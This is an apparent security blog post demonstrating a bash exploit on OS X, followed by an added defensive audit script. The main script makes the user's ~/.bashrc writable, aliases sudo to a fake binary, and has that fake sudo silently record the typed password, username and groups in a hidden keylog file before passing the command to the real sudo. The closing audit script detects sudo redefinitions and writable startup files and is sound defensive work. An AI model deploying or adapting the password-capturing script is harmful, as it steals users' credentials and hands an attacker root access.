Way Too Much Sudo Fun
Bashing bash again because it's so much fun and above all so easy.
As demonstrated in 'Sudo Fun', it's possible to hijack use of the Unix sudo to obtain less than optimal results: OS X boxes can be compromised in a number of ways.
As demonstrated in 'Too Much Sudo Fun', it's possible to humiliate bash without any risk of the maintainers doing anything about it. ~/.bash_profile is used to accomplish this.
But it turns out even ~/.bashrc can be made into a turkey. And that's demonstrated here and now.
#! /bin/bash
userhome="/Users/`whoami`"
fakesudo="/Users/Shared/sudo"
logfile="/Users/Shared/.keylog"
target="$userhome/.bashrc"
if [ -f $target ]; then
    if [ ! -w $target ]; then
        chmod a+w $target 2>/dev/null || exit 1
    fi
else
    touch $target 2>/dev/null || exit 1
fi
grep -sq sudo $target || cat <<EOF >>$target
if [ -x $fakesudo ]; then
alias sudo="$fakesudo"
fi
EOF
if [ -f "$fakesudo" ]; then
    rm -f "$fakesudo" 2>/dev/null
fi
touch "$fakesudo"
chmod a+x "$fakesudo"
echo '#! /bin/bash'>>"$fakesudo"
echo '#'>>"$fakesudo"
echo 'inp=""'>>"$fakesudo"
echo 'stty -echo'>>"$fakesudo"
echo 'read -p "Password:" inp'>>"$fakesudo"
echo 'stty echo'>>"$fakesudo"
echo 'echo'>>"$fakesudo"
echo 'logfile="/Users/Shared/.keylog" '>>"$fakesudo"
echo 'echo "$inp">>"$logfile"'>>"$fakesudo"
echo 'echo `whoami`>>"$logfile" '>>"$fakesudo"
echo 'echo `groups`>>"$logfile" '>>"$fakesudo"
echo 'echo "Sorry, try again."'>>"$fakesudo"
echo '/usr/bin/sudo "$@"'>>"$fakesudo"
echo 'rm -f "/Users/Shared/sudo"'>>"$fakesudo"
echo 'bash ' >> $fakesudo
echo 'exit 0'>>"$fakesudo"
bash
exit 0
There are a few caveats with this exploit but it does prove a point. Namely that it's all too easy - not with OS X but with bash - to own a machine.
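To check an account for what the script above leaves behind, here is an added example (not code from the original article) that audits bash startup files for a redefined sudo and for startup files writable by group or others. The function names and the list of startup files are assumptions made for this example.

```bash
#!/bin/bash
# Added defensive example, not code from the article: audit bash startup
# files for the two traces the script above leaves behind.

# Matches "alias sudo=", "sudo() {" and "function sudo" anywhere on a line.
SUDO_REDEF='(^|[^[:alnum:]_])(alias[[:space:]]+([^#]*[[:space:]])?sudo=|sudo[[:space:]]*\(\)|function[[:space:]]+sudo([^[:alnum:]_]|$))'

# audit_rc FILE: print findings for one file; exit status = number found.
audit_rc() {
    local file="$1" findings=0 n=0 line
    [ -f "$file" ] || return 0
    # Trace 1: startup file writable by group or others (the chmod a+w step).
    if [ -n "$(find "$file" -prune \( -perm -020 -o -perm -002 \) -print)" ]; then
        printf '%s: writable by group or others\n' "$file"
        findings=$((findings + 1))
    fi
    # Trace 2: sudo redefined, so typing "sudo" no longer runs /usr/bin/sudo.
    while IFS= read -r line || [ -n "$line" ]; do
        n=$((n + 1))
        case "$line" in \#*) continue ;; esac   # skip full-line comments
        if printf '%s\n' "$line" | grep -Eq "$SUDO_REDEF"; then
            printf '%s:%d: sudo redefined: %s\n' "$file" "$n" "$line"
            findings=$((findings + 1))
        fi
    done < "$file"
    return "$findings"
}

# audit_home DIR: audit each startup file bash may read in DIR (assumed list).
audit_home() {
    local dir="$1" total=0 f
    for f in .bashrc .bash_profile .bash_login .profile; do
        audit_rc "$dir/$f" || total=$((total + $?))
    done
    return "$total"
}

# Read-only check of the invoking user's home, or of the directory given as $1.
audit_home "${1:-$HOME}" || echo "review the findings listed above" >&2
```

A legitimate sudo alias (for example one that adds a flag) is reported too, so each finding needs a look at where the definition points.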
See Also Sudo Fun ACP Services Resolve Path Too Much Sudo Fun
Thanks again to GC at the CLIX Exchange for pulling another all nighter.